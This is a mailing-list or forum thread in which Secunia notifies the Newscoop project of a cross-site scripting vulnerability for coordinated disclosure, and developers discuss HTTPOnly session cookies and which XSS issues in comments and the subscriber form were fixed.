A third party researcher has discovered a vulnerability in
Newscoop, which can be exploited by malicious people to conduct
cross-site scripting attacks
We have confirmed the vulnerability in version 3.5.0 and are
contacting you to attempt a coordinated disclosure. We have reserved
Secunia Advisory SA43152 and set a preliminary release date of February
16th, 2011 for the publication of our advisory.
Please provide us with the contact details of your security team so we
can provide the vulnerability details.
Kind regards,
--
Tiago Seco
Junior Security Specialist
Secunia
Weidekampsgade 14 A
DK-2300 Copenhagen S
Denmark
Posts: 1,526Member, Administrator, Sourcefabric Team
In addition I'd like to inform that Newscoop has administration session cookies with HTTPOnly parameter (was introduced in 3.4.2 release). It prevents a session grabbing via any injected code - javascript has no access to session information.
The latest cross scripting vulnerability was on the frontend, not admin: a
reader could write comments that contain Javascript code - this was fixed in
3.5.0. The same possibility exists for the subscriber data form - this was
not updated yet to filter out Javascript. The problem is minor though, I
never heard of any site using the template based subscriber form to allow
their readers to update personal data.
> I addition I'd like to inform that Newscoop has administration session
> cookies with HTTPOnly parameter (was introduced in 3.4.2 release). It
> prevents a session grabbing via any injected code - javascript has no access
> to session information.
>
True, as Ofir said... there was an XSS problem re: Comments, Ofir
reported it... and while fixing it I found a couple more, also fixed.
One more was fixed by Martin and I think he also fixed the problem
with Subscribers Mugur is mentioning.
On Wed, Feb 2, 2011 at 8:04 PM, Mugur Rus
<newscoop-dev@lists.sourcefabric.org> wrote:
>
> The latest cross scripting vulnerability was on the frontend, not admin: a
> reader could write comments that contain Javascript code - this was fixed in
> 3.5.0. The same possibility exists for the subscriber data form - this was
> not updated yet to filter out Javascript. The problem is minor though, I
> never heard of any site using the template based subscriber form to allow
> their readers to update personal data.
>
> Mugur Rus
> Senior Software Developer, Sourcefabric
> mugur.rus@sourcefabric.org
>
> Cluj-Napoca, Romania
> +40 (0)720 528408
> Skype: mugur_rus
>
> http://www.sourcefabric.org
> http://www.twitter.com/Sourcefabric
>
>
>
> On Wed, Feb 2, 2011 at 8:58 PM, Andrey Podshivalov <
> newscoop-dev@lists.sourcefabric.org> wrote:
>
> > I addition I'd like to inform that Newscoop has administration session
> > cookies with HTTPOnly parameter (was introduced in 3.4.2 release). It
> > prevents a session grabbing via any injected code - javascript has no access
> > to session information.
> >
>
>